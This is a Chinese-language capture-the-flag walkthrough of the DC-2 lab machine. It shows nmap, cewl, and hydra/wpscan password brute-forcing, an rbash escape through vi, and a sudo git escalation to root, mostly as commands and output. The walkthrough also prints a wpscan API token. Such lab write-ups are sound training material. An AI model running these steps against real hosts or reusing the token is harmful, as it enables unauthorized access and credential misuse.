主要知识点
- 密码爆破
- rbash逃逸
具体步骤
nmap开始扫描,80和7744端口开放
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 14:24 UTC
Nmap scan report for 192.168.59.194
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
而80端口其实是一个wordpress,并且需要把 dc-2和ip地址绑定,添加到/etc/hosts文件中
主打一个听劝,使用cewl命令爬一下网站,并保存成result.txt文件
C:\home\kali\Documents\OFFSEC\play\DC-2> cewl -d 2 -m 5 -w result.txt http://dc-2 -v
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://dc-2
Visiting: http://dc-2, got response code 200
Attribute text found:
DC-2 DC-2 » Feed DC-2 » Comments Feed RSD
Visiting: http://dc-2/index.php/what-we-do/ referred from http://dc-2, got response code 200
Attribute text found:
DC-2 DC-2 » Feed DC-2 » Comments Feed RSD
Visiting: http://dc-2/index.php/our-people/ referred from http://dc-2, got response code 200
Attribute text found:
DC-2 DC-2 » Feed DC-2 » Comments Feed RSD
Visiting: http://dc-2/index.php/our-products/ referred from http://dc-2, got response code 200
Attribute text found:
DC-2 DC-2 » Feed DC-2 » Comments Feed RSD
Visiting: http://dc-2/index.php/flag/ referred from http://dc-2, got response code 200
Attribute text found:
DC-2 DC-2 » Feed DC-2 » Comments Feed RSD
Offsite link, not following: https://wordpress.org/
Offsite link, not following: https://wordpress.org/
Offsite link, not following: https://wordpress.org/
Offsite link, not following: https://wordpress.org/
Offsite link, not following: https://wordpress.org/
Writing words to file
利用result.txt当做wordlist来爆破ssh,和wordpress,(虽然jerry的用户的密码就是wpscan爆破出来的adipiscing,但是是无法直接用ssh登录的)
C:\home\kali\Documents\OFFSEC\play\DC-2> hydra -L users.txt -P result.txt ssh://192.168.172.194 -s 7744
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 23:26:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 330 login tries (l:2/p:165), ~21 tries per task
[DATA] attacking ssh://192.168.172.194:7744/
[7744][ssh] host: 192.168.172.194 login: tom password: parturient
[STATUS] 249.00 tries/min, 249 tries in 00:01h, 82 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-13 23:28:08
C:\home\kali\Documents\OFFSEC\play\DC-2> cat users.txt
tom
jerry
......
......
C:\home\kali\Documents\OFFSEC\play\DC-2> wpscan --api-token XZsKtip2dGWYxKgh0KZxVhbTC65XIvYT86wZiu9COWs --proxy socks5://127.0.0.1:7890 -e --url http://dc-2 -U tom,admin,jerry -P result.txt
......
......
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / sometimes Time: 00:01:49 <============================================================================================= > (467 / 796) 58.66% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
使用tom/parturient来ssh登录,成功,不过得到的是一个rbash,非常受限,且无法修改PATH的值
C:\home\kali\Documents\OFFSEC\play\DC-2> ssh tom@192.168.207.194 -p 7744
tom@192.168.207.194's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 15 07:29:17 2024 from 192.168.251.207
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-rbash: PATH: readonly variable
tom@DC-2:~$
不过我们查看一下如何逃逸rbashhttps://systemweakness.com/how-to-breakout-of-rbash-restricted-bash-4e07f0fd95e
在这个场景下,逃逸rbash的方法是利用vi命令
- 输入vi命令后,并输入 :set shell=/bin/bash
- 输入 :shell ,回车
- 之后会退出vi界面(其实没退出,只是看起来像是退出了而已),在这里我们可以更改path的值,来增加可以调用的命令数量,规避限制
tom@DC-2:~$ vi
tom@DC-2:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
tom@DC-2:~$
尝试一下wpscan爆破出的jerry的密码 adipiscing,尝试转变成jerry用户,成功
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
参考一下GTFObins,提权成功
jerry@DC-2:/home/tom$ sudo /usr/bin/git -p help config
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
......
......
!/bin/bash
root@DC-2:/home/tom# cat /root/proof.txt
657cb0ffebe120f1e0686bf3226c8ca0
root@DC-2:/home/tom#